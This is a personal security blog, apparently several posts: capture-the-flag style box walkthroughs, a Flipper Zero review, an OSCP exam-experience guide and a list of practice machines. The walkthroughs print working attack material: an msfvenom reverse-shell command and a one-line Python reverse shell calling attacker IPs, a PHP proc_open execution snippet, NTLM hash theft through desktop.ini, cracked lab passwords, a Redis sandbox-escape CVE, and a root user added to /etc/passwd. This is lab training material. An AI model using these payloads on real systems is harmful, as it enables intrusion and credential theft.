As usual we start with Nmap:

Lots of ports, appears to be a DC.

After some more additional tests i realize that probably penetrating the box via network attacks is not gonna work:

I decided to go back to Web analysisi, and realized a thing that was probably responsible for many hours of frustration in many different boxes:

Basically, gobuster, when scanning Virtual Hosts, now needs to be instructed to append the fucking domain with the following flag:

--append-domain

And finally:

HOLY FUCKING SHIT IT TOOK SO LONG TO FIND THIS.

Take a look at the URL...

...hmm, smells like LFI or even RFI

I wonder if outbound SMB is enabled:

now we only need to fire up hashcat and hope. But after a while, against all odds,  hashcat actually managed to crack it with rockyou:

sudo hashcat -m 5600 hashes /usr/share/wordlists/rockyou.txt -o crk    

We get our first set of credentials:

usr: SVC_APACHE
psw: S@Ss!K@*t13

running enum4linux again with credentials we get a nice list of domain users:

No write permission on network shares, nothing much to do.

At this point, i guess it's worth trying a password spray since the lockout threshold is non existent.

We get a hit for the user S.Moon. With this user, we can write to the Shared folder:

After some more enumeration, i figured that the probable next step would be to gather credentials or gain code execution in the context of the "C.Bum" user, which is a senior web developer. Since "S.Moon" is a junior web developer, they probably work together.

After almost giving up, (wasting days trying to execute some kind of custom php code) i finally stumbled upon the solution...

It's all about NTLM hash stealing: If we can write to a folder we can create a custom desktop.ini file that contains all the information regarding icons in the folder. If we put a UNC path as the folder icon, the victim account will look up via SMB the file, thus leaking the hash.

Follow https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

We use the same hashcat command as before

sudo hashcat -m 5600 hash_bum /usr/share/wordlists/rockyou.txt -o crk 

and here we go

psw: Tikkycoll_431012284

In all honesty, i didn't really like this part, you have to assume that C.Bum is going around in the "Shared" network share looking actively at files.

After some more enumeration with the newly found user, we have write permission for the "Web" share! NOW we can finally upload a revshell in the Web share.

I used Ivan's great php reverse shell: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

Privilege Escalation

Even though it's absolutely not obvious there is a hidden local service running on port 8000:

It doesn't appear to be local only since it is bound to the meta-address 0.0.0.0 and not the usual loopback address (127.0.0.1). A quick scan with Nmap from the attacker machine confirms that the port is probably filtered at the firewall level.

I use Chisel to do some port forwarding action in order to better investigate the service. I bind the victim port 8000 to the attacker port 4444:

And here's the hidden website:

now i can use whatweb to try and get some more infos:

It's IIS so let's check out the C:\inetpub folder, but we discover that both svc_apache and S.Moon don't have permission to write in that folder.

C.Bum is probably able since he is a Senior Web developer at the company.

Using this script i execute a netcat + wrapper (MAKE ARTICLE ABOUT CUSTOM NC) as the user c.bum. Basically a wrapper for a RunAs command in powershell:
https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1

and on another shell

I can confirm that C.Bum can write to the C:\Inetpub\developer folder (which contains the aforementioned website). I upload a shell to "C:\inetpub\development\development" and:

We are a REAL service account now, whit the ususal service privileges (SeImpersonatePrivilege). Now it's all about potatoes (after getting a stable shell that is, of course).

And finally, after a grueling fight, we get a system shell:

Fantastic box i must say, some steps were quite trivial but very enjoyable nonetheless.

Start with nmap:

Only 2 ports, i connect to the website and add the hostname to the /etc/hosts file:

The webapp is just a web-wrapper for a curl command:

The user agent is siteisup.htb, so probably it's a custom script:

It seems that it has some filters that prevent injection.

I use gobuster and find the /dev/ folder

At the same time i find the "dev" subdomain

Unfotunately the server always answers with the code 403 forbidden for all pages in the subdomain.

Inside the /dev/ folder there's a .git folder containing the source code of the application (even though it seems to be an old version of the app):

I can dump the source code using the awesome GitTools (https://github.com/internetwache/GitTools)

Inside the .htaccess file i see that a header is required to connect:

So i add the header with the Firefox extension "Modify HTTP header values":

and now i can connect to dev.siteisup.htb:

The development version of this app allows a user to upload a text file containing a list of domains to feed to the application.

Now looking at the source code for the page checker.php (gathered thanks to the ".git" folder preciously found) we can see the different type of filtering in place and at the same time how the upload function works:

After checking for bad extensions, the php app uploads the file to a temporary directory with the md5 hash of the current time and as expected the /upload folder is browsable:

While reviewing the code i noticed that the app doesn't check for ".phar" files. These are valid file that will be interpreted as php code by the webserver.

Since the applicaton checks with curl every single line of the document i decided to purpusly let hang the curl process in order to have enough time (the timeout time) to browse the uploaded file before it deletes it.

A kept open a nc listener on port 80 and submitted the file, the server hangs while waiting for an answer, in the meantime i was able to browse the file!

It works!

After further analysis, i discovered that basically the majority of interesting function was disabled except proc_open.

I had some issues executing code with proc_open since the basic examples from hacktricks miss some "pipe-management features" so i built them myself:

<?php

$cwd='/tmp';
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("file", "/tmp/error-output.txt", "a") );
$process = proc_open("ping -c 10.10.16.3", $descriptorspec, $pipes, $cwd);

echo stream_get_contents($pipes[1]);
fclose($pipes[1]);

?>

and sure enough i got some ping hits:

Next i simply used msfvenom to generate an ELF reverse shell.
I uploaded it, executed it and achieved RCE:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.3 LPORT=4454 -f elf > rev_shell.elf 

Of course with each execution i had to stop the process with the nc listener (as done above).

It's ugly but it works, i'm aware that i could have built a better command to achieve the same thing in a single POST request.
But at last, a foothold:

inside the /home/developer folder there is a binary file with the SUID bit set:

This application appears to be a wrapper for the python app. The python app is just a CLI version of the website:

Some basic injection tests revealed that the app is vulnerable to python command injection:

I can reuse the same port as before and spawn a shell with UID 1002 (developer):

At this point i can read the id_rsa file of the user developer:

And get the first flag

Privilege Escalation

Starting with a typical sudo enumeration:

sudo -l

the binary easy_install can be run as SUDO!

the easy_install binary has an entry on gtfobins: https://gtfobins.github.io/gtfobins/easy_install/

That makes as easy as copying and pasting 3 lines

Is it a toy? Maybe
Is it a tool? Possibly
Is it a dolphin? Definitely
Is it awesome? Absolutely

The Flipper Zero is an incredible little tool. It's both a cute little Tamagotchi and an incredible security research tool.  

In its (apparent) simplicity, it's packed to the brim with sensors and antennas.
It allows for testing and analysis of a wide array of radio protocols, access control systems, etc:

- RF SubGHz Spectrum
- NFCs
- RFIDs
- IButton / 1-Wire
- Infrared Signals
- GPIO Shenanigans (SPI/UART bridging)
- And much more

The Flipper Zero was founded on Kickstarted, i discovered the campaign when it already ended but it took me little to no time to fall in love with it <3

Since receiving my Flipper Zero, i've been playing non-stop with it: I tested multiple cards, protocols, remotes, and frequencies and i delved into more complex firmware modifications.

After a little over a month, i have to say, this device is insane.

It sparked a great interest in the world of radio frequencies, so much so that i got myself an HackRF xD (A story for another post)

Keep in mind that, while it's considered a "general" purpose tool, Flipper Zero has to be used in specific ways. It's neither a magic tool nor a full testing workbench.
For instance, there is a spectrum analyzer available for the Flipper but between the small LCD screen and low-power nature of the components, it's not really the most useful feature.

Initial testing and studying is always best if done in a laboratory-like environment with bench devices like the ACR122U NFC reader paired with nfclib or the aforementioned HackRF (as well as any other SDR).

That being said, if you want to integrate anything specific you can program directly a Flipper application (FAP packages) to load into the device. The FAPs are written mainly in C so it's possible to do some really interesting low-level stuff :)

And if you're crazy enough you can also create an external module to interface with the Flipper's GPIOs. An 802.11 module to expand the Flipper capabilities is already available.

This is, in my opinion, the best part: opensource and customizable!

As of today, the device is still in its early stages but i can only imagine what the Flipper Zero community will be releasing in just a few months.... It's gon be gud

The platform also rocks official fully featured Windows/Mac software and a mobile app. The Flipper app (Android & iOS) connects via Bluetooth to your Flipper Zero and allows you to transfer files, remote control and even update to the device remotely via Bluetooth.

If you want to delve deeper into the topic i'll leave here some interesting resources:

• Official Forum
• Official Documentation
• Awesome Flipper: A repository full cool stuff!
• Flipper Zero Italia community

I'll document in detail some experiments in the future, this post was not meant to be a complete guide but more like an introduction to on Flipper Zero and its capabilities. Especially the field of Radio Frequency is big and includes a lot of physics. Very interesting!
I understand now why there are people with such dedication in Ham Radio

This device is a tool for researchers and hobbyists alike to play, test and study this very field of communication. Flipper Zero is a far cry from key grabber devices (such as the Pandora DX and similar), it's not meant to be used for illegal activities and, if unmodified, has many restrictions in place for this very reason.

I hope i sparked some curiosity, if not for the Flipper Zero itself, at least for this field in communication security.

Thanks for reading & Happy Hacking :)

I start with nmap as usual:

sudo nmap -Pn -n -T5 -vv -sT -sC -p- shared.htb

Only 3 ports open, all web services. As usual i add the IP/domain to the '/etc/hosts' file.

Now i'm able to connect to the website which is a simple Prestashop e-commerce CMS with an interesting message:

Looks like they got a new checkout system. Let's test it out!
After adding an item to the cart i go to check out and, after adding the subdomain to the "/etc/hosts" file, i'm greeted with this page:

From the looks of the HTTP traffic, the data is contained within the cookie "custom_cart":

I noticed that if i add some particular characters i can break the page, maybe the database uses the cookie as input? If so it might be SQL Injectable.

It has been ages since i used an automated SQLi tool so i decided to use SQLmap this time.

I save the request to a file and URL decode the cookie

I then feed it to sqlmap with no particular fine-tuning options, just to see how well it recognizes the vulnerability

But sure enough, it identifies a UNION based SQL Injection vulnerability.

As usual i stroll around the DB looking for interesting stuff. And what do you know?  I stumble upon a nice MD5 hash for the user "james_mason" inside the DB:

Using crackstation.net's rainbow tables, i quckly recovered the password:

Soleil101

With this password i can log in as james_mason via SSH:

Foothold

I use pspy to monitor processes and activites while i enumerate with linpeas. A redis server running as root was quickly identified.

Unfortunately is password protected, I'll get back to it later

While glancing over the pspy results i notice that the user dan_smith (UID=1001) uses Ipython (Python command shell with advanced functionalities) in a specific way:

Before doing anything, dan_smith moves inside the '/opt/scripts_review' folder wich is writable to us since our user is in the developer group.

While researching online for some interesting IPython settings i found this advisory:

CVE-2022-21699 - GitHub Advisory Database

Execution with Unnecessary Privileges in ipython

GitHub

The example in the article is pretty straightforward, i have to create a fake user folder containing an IPython autostart script. This way i'll be able to force dan into executing python code.

First i create the structure in the /tmp folder:

With the following python reverse shell:

import sys,socket,os,pty;s=socket.socket();s.connect(("10.10.14.124",int(4455)));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")

Then i copy the python autostart script to the /opt/scripts_review folder. The folder where dan executes IPython

After waiting for a bit i receive the reverse shell, as expected the user is dan_smith:

I steal dan_smith's ssh key and connected via ssh:

Privilege Escalation

After some enumeration, i discover that dan is in the group sysadmin

This allowes me to execute a custom binary called "redis_connector_dev".

This program authenticates to the Redis server and shows some stats.

Since this script probably authenticates with the server, i decided to pull off a trick similar to the one done for the Support HTB Machine:

I downloaded the program and, as expected, it doesn't run locally since there is no Redis server on my kali box.

I then created a listener on the default Redis port (6379). Since most of the communications with a redis server is unencrypted, it is possible to read the password:

With this password, i was finally able to connect to the Redis instance using the readily available "redis-cli" binary.

At this point I'd use the famous redis-rogue server technique (either with a script or manually) to achieve RCE as root and call it a day. But in this particular box the Redis server either kept crashing or couldn't load the malicious extension.

After some digging i discovered a farily recent CVE, CVE-2022-0543.
Basically this vulnerabilty abuses the EVAL  function that redis uses to run LUA sandboxed commands. Apparently it's possible to bypass this sandbox and execute commands on the underlying OS:

More information on the EVAL function in Redis: https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html
Github exploit page: https://github.com/aodsec/CVE-2022-0543

Remember kids, keep your arsenal and techniques updated!

But after cloning the repo i noticed in the code that the exploit doesn't support password authentication out of the box:

Nothing to worry about!
In no time i found the answer in a (you guessed it) stackoverflow thread.

Once modified, it's ready to go!

Before running the exploit though, i needed a way to communicate with the local Redis server instance on the target box. We already saw that the Redis port is not reachable from our kali machine.

Of course, port forwarding is the way

I decided to use chisel:

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH.

I'll skip the detailed explanation on how chisel works for now, check out its github page if you want more information.

Server setup (kali machine):

Client setup (target box):

Now the exploit can be run against localhost:

And here's RCE, as root!
Now i add a new user to /etc/passwd to quickly log in as root:

(The password is the DES hash of the word 'evil').
Now as i can log in as the user 'brutto'

Happy Hacking ;)

Since I recently completed the OSCP exam and started this blog, I'd like to share some suggestions and insights about this journey. I'll try to keep it as short and informative as possible by touching on the following subjects:

• Whoami
• PWK & OSCP
  - PWK Course
  - PWK Lab
  - OSCP Exam
• How to prepare
  - Mindset
  - Methodology & Cheatsheet
  - Using Solutions & Writeups
  - Training Material
• My Exam attempts
• Conclusions

Note: This is not meant to be an exhaustive guide, I’m only sharing what I learned from this experience. Also, since English is not my first language, expect some minor errors. You can reach out if you want to suggest some edits ;)

Whoami

My name is Walter and I'm your friendly Italian internet neighbor. I'm very passionate about tech and security (among many things).  I started studying computer science very early at a technical High School (ITIS in Italian) in Milan. After high school, I found a job and started working right away in IT.

During these years I managed to get a Job in one of the biggest Italian SOCs as a security analyst, but Red Teaming has always been what I really wanted to do. The OSCP felt the right certification to prove myself.

It took me three tries to pass the exam, but with each attempt I was able to recognize my errors and slowly tune my methodology. Now I realized that I started this journey thinking it was a 200 meters sprint when instead it was a 200 hours marathon.

PWK & OSCP

PWK & OSCP Frequently Asked Questions | Offensive Security

Get official answers to the most common questions about Penetration Testing with Kali Linux and the OSCP exam. Learn about requirements, prep, and more.

Offensive Security

PWK

"Pentsting With Kali" is the flagship course offered by Offensive Security, it is paired with the famous OSCP exam.

I found the material, for the most part, quite straightforward. Of course, some topics were particularly difficult but google is your best friend during this journey, and It's also a great chance to improve your google-fu.

The course also provides multiple exercises (more than 100) to strengthen your skills on all the covered topics. They are very specific (and time-consuming) so I decided to focus only on what I thought were the most useful. In the end, I found that for me practicing on actual boxes was a lot better.

I think that the PWK Course does a good job teaching you most of the skills necessary to pass the exam, some more than others. What made the difference to me was integrating the PWK material with external websites and material (specific courses, books, conferences).

For example, I was struggling with the Privilege Escalation module for a while until I purchased the awesome Tib3rius Privilege Escalation course (highly recommended) for both Windows and Linux on Udemy.  As a learning platform, i found Udemy quite awesome, I really enjoyed its courses.

PWK Labs

A Path to Success in the PWK Labs | Offensive Security

As part of our ongoing efforts to support student success, we’re introducing a new learning path for the PWK labs. Find out more - along with pass rate data.

Offensive Security

I bought my first voucher with lab time included a few years ago so pricing is probably different, but the network structure of the lab itself has not changed that much over the years.

The most appealing part of the lab is the variety of environments, the presence of retired exam boxes, and the possibility to practice pivoting through different subnets and multiple departments. The lab should not be thought of as a CTF lab, instead, it resembles more of a real-life assessment.

Given the fact that the closest example of the exam environment will probably be the PWK lab, I suggest you use it when you're feeling ready to do some 24h simulations.

OSCP

https://help.offensive-security.com/hc/en-us/articles/4412170923924-OSCP-Exam-FAQ

The OSCP exam is tough, I think everyone can agree on this. I know that the actual boxes are not THAT hard once you compromise them, but the amount of work for only 24h puts your methodology and endurance skills to the test.

The OSCP exam is proctored since 2020. That means that someone from Offensive Security will be always watching you from the webcam to make sure no cheating (or other weird stuff) is happening; you should check the official article for more information: https://www.offensive-security.com/offsec/pwk-2020-update/

Having a proctor watching during the exam did not bother me, after a while you kinda forget about it.

Note: If you are not aware of the 2022 exam changes (BOF with Privilege Escalation and Active Directory Environment) take also a look at the official OffSec article: https://www.offensive-security.com/offsec/oscp-exam-structure/

Don't forget that the actual evaluation of your exam is based on the exam report that you'll deliver. So always keep an eye on the official Reporting Guide: https://help.offensive-security.com/hc/en-us/articles/360046787731-PEN-200-Reporting-Requirements

How to prepare

The Mindset

As said previously, the exam will test not only your knowledge but your time and resource management skills as well. It really is like a marathon, so prepare to suffer a bit.

I found some great insights in some slides from a very interesting talk by a security researcher specialized in IoT and ARM exploitation, Azeria (https://twitter.com/Fox0x01). Related to these slides there is also an article on her website:

The Process of Mastering a Skill

Azeria-Labs

The article talks at great lengths about the ins and outs of mastering your craft and how to approach the process of learning a new skill from scratch.

In retrospect, after achieving both the OSCP and eCPPTv2, I couldn’t agree more. This stuff is gold so make sure to give it a nice read.

The Methodology & Cheatsheet

Remember to Try Harder but most importantly TRY SMARTER! And the best way to do things in a smart way is to follow a good methodology.

After countless failures and re-iterations, I found that what worked for me best is having a dedicated checklist and a methodology mindmap (I use XMind): https://www.xmind.app

At the same time you'll need a personalized cheatsheet with all your commands and tricks. This is going to be your arsenal! Making a good cheatsheet, at least for me, was not easy, it took me a while to figure out what was important and what was unnecessary.

As an example, most of the theory can be looked up online, having a messy cheat sheet with lots of text is not useful. Here’s the difference between my first and last cheatsheet:

My first "Cheatsheet"

My winning Cheatsheet

Consider using Markdown to write your notes, it's easy to write but very powerful, pair markdown with software like Obsidian and unlock its full potential.

Some external resources on the topic:

• https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-methodology
• The cond4 youtube channel has many videos dedicated to taking notes and reporting
• My Hacking Cheatsheet, I'll try to keep it as updated as possible. Unfortunately it's a bit hard to read since it's half in Italian and half in English

There are multiple guides online on how to build a better methodology. I suggest you take inspiration from some online resources to build your own. Don't forget to be thorough in following your schemes, DO NOT skip steps and try to stick to what you wrote as much as possible.

Using Solutions & Writeups

Contrary to what some people think (especially my old boss) solutions and writeups are incredibly useful when learning.

Proving to yourself that you can do something is important but wasting days at a week bashing your head against the keyboard is neither useful nor fun. At the same time, you shouldn't give up and always apply the "Try Harder" mindset. The question comes naturally: How am I supposed to do this without going crazy?
The answer is once again: A good Methodology.

It's very easy to get frustrated and lie to yourself that "you tried everything" when most of the time you are missing something so insignificant that probably already passed your mind. This is not great since it's very time-consuming, not to mention very frustrating.

I solved this problem with a checklist, built out of experience, to follow step by step every time you're hacking. This is an invaluable tool in your arsenal. Now, once you have exhausted your methodology, I would take a glimpse at the write-up to get unstuck. When you learn something new, stop what you're doing and write it down on your cheatsheet. Don't skip this step otherwise you'll find yourself repeating the same errors over and over again. This is to me the best way to learn while practicing.

Practicing Materials:

• OffSec PWK Lab: as stated previously I would suggest using the lab only when doing the 24 Hours exam simulations
• OffSec Proving Grounds [Practice Edition]: the best resource IMO, for a list of practice boxes check out my article. I suggest you pay for the "Practice" section.
• Hack The Box: Whilst great practice, I found the boxes in Proving Grounds to be better practice for the exam, HTB has a lot of focus on CTF-like boxes. If you chose to use HTB I would also use a list of boxes such as the TJNull list or this one.
• TryHackMe: Great for learning and practicing, I love the fact that no matter the topic THM will always have a step-by-step solution/guide. I found it extremely useful when studying concepts that I found particularly difficult, even the premium subscription is worth it in my opinion. These are the rooms that I would suggest:
  - Wreath: a MUST to master Pivoting and Tunneling.
  - BOF Prep: A room to refresh the BOF methodology
  - The Overpass Series [1, 2, 3]: Simple boxes but don't get too relaxed ;)
  - VulnNet Internal: Internal network assessment in a Linux environment.
  - Throwback: Great network of multiple boxes but keep in mind that this lab is much more difficult than the AD section in the OSCP. If you manage to pwn this you are more than ready.
• Local BOF:
  - https://github.com/3isenHeiM/OSCP-BoF
  -  https://www.vulnhub.com/entry/brainpan-1,51/

In the end, I don't think there is a "one size fits all" in terms of training. I'd rather mix and match lists and boxes to cover (and practice) the majority of topics.

My OSCP Exam Attempts

First Attempt, September 2021

[Old exam format]

"There is no time like the first time"

In this attempt, being the first ever, I didn't know what to expect other than what was specified in the official documentation. The exam started at 5 AM, I was able to clear the BOF in around an hour and I was only able to gain one additional foothold after 5/6 hours.

Unfortunately, I got stuck bad and was only able to progress after a few hours. Once understood how to get going, I was able to gain another foothold but I was already behind schedule. The 14th-hour mark had already passed. I drank a ton of caffeine and managed to stay the entire 24h span awake but needless to say, it was not useful.

In the end, I had around 40 points, a liquefied brain, and very demoralized. I decided to not even submit the report. Looking back at this attempt I realize that i wasn't ready. But having a clearer understanding of the exam experience revealed to be extremely useful for future attempts.

Second Attempt, April 2022

[Updated Exam with AD environment]

"Ah shit, here we go again"

This time I had a much better idea of what I was going to face, of course, i still had some doubts about the active directory section but I felt confident. I was able to clear the BOF (and subsequent privesc) again in around 1 hour. I decided to tackle the AD environment right away but, once again, I got stuck on the foothold for 5/6 hours with no real progress; which drained most of my energy.

I knew that mathematically I had to compromise the entire AD environment to have a chance of passing the exam. Powering through it felt like the only thing to do. Once I realized that I was overthinking like crazy, I managed to compromise the entire AD environment in around one hour.

At this point, at the 14th-hour mark, I had completed the AD environment (40 points) and the BOF (10+10) for a total of 60 points. I was only 10 points short of passing the exam! I was so pumped that I decided to skip sleep to quickly get the missing points but powering through the exam, just like last time, didn't work...

In the end I was really demoralized, I didn't have the lab report ready to submit so I couldn't even rely on the bonus points. I ended the exam missing those 10 points, again pretty demoralized. I quickly threw together the exam report but I knew it didn't matter at that point. Another Failure.

Third attempt, July 2022

"Third time's the charm, right?...  Right??"

During the cooldown months imposed by Offensive Security, I stepped up my game by finally fixing the cheatsheet and improving the quality of my time spent practicing. I completed my Proving Grounds List and most of the TjNull HTB List.

During the last weeks before the exam, I felt so confident that I decided to test my preparation with the eCPPTv2 certification from eLearnSecurity.In less than a week i submitted my report and earned the eCPPTv2, all of this only 2 weeks before my actual OSCP (a story for another time). At this point, I knew i was ready.

The days prior to the exam i decided to refresh my BOF methodology and review some AD theory. I also toned down the practicing since I didn't want to get burnt out before the big day. The exam started on the 16th of July at 11:00 AM.

I decided to go with the BOF as my first target, as usual, it took a little over one hour to get the exploit working and a bit more to root it. At this point I decided to go with a standalone box which I cleared (local + root) in around one hour. Honestly I wasn't expecting it to go this smoothly, after a bit less than 3 hours I had already secured 40 points.

After a break I focused exclusively on the AD environment; I managed to not get blocked in a pesky rabbit hole and quickly found the way around the first foothold in roughly one hour. The rest of the AD went so quickly that I had to force myself to stop and take notes/screenshots for the report. At around 5 PM i submitted the domain flag for the AD environment. At this point, 6 hours had passed and I had already 80 points.

I took a long break where I eat dinner, took a shower, and relaxed a bit. This was well needed. After it, I managed to find the final foothold in around 1 hour and got root in another hour. At this point it was done, I was able to clear the OSCP exam in less than 10 hours without Metasploit.

Conclusions

As I said at the beginning, try to see this journey as a marathon and not as a sprint. Anything rushed is not worth it so take your time and try smarter!

Preparation Tips

• Studying is important but practicing is fundamental.
• Finish what you started, don't do multiple boxes at once.
• Keep the practice fun, mix up things a bit if it becomes frustrating. It's easy to get burned out.
• Try SMARTER, focus on your methodology.
• Practice Practice and Practice I can't stress this enough! The more you hack the better the chances of passing the exam.
• Once you have built some confidence test yourself on the PWK labs with multiple simulated 24h exam.

Exam Tips:

• SLEEP! No matter how bad you feel the exam is going, powering through it will only lead to more frustration. Your brain needs to rest, whether you like it or not.
• Even if it sounds weird, it's important to keep yourself "pumped up" for the duration of the exam. Go after easier boxes if you're starting to get tired. Frustration is a bad co-pilot in this ride.
• During the exam you have multiple reverts, make sure to use them if something doesn't feel right.
• Don't be afraid of taking long breaks during the exam, just don't get too relaxed ;)
• Again, remember to eat and sleep! Don't power thro

I hope that you found this article useful or interesting, I had a lot of fun writing it. If you have any questions feel free to reach me.

Here's a quick list of boxes in the Offensive Security Proving Ground platform thaat i used to prepare for the OSCP exam. These are from the "Practice" section so a premium subscription is required, in alternative you could try to find these boxes on websites like VulnHub (https://www.vulnhub.com).

I'll try to update this list as often as i can, feel free to suggest some more.

I don't remember from where i got the original list that i have since modified, if you happen to know i'll add some credits here.

Linux

• ClamAV
• Wombo
• Fail
• Nibbles
• Banzai
• Hunit
• Dibble
• Zino
• Hetemit
• Peppo
• Postfish
• Malbec
• Sybaris
• Fail
• ZenPhoto
• Readys
• Nukem
• Walla
• Pelican
• Snookums

Retired or removed

• Sorcerer
• Hawat
• Payday

Windows:

• Nickel
• Slort
• Authby
• Jacko
• MeatHead
• UT99
• MedJed
• Algeron
• Billyboss
• Hutch
• Heist
• Vault
• Shenzi
• DVR4
• Craft

Retired or removed

• Hepet
• Butch
• Kevin
• Metallus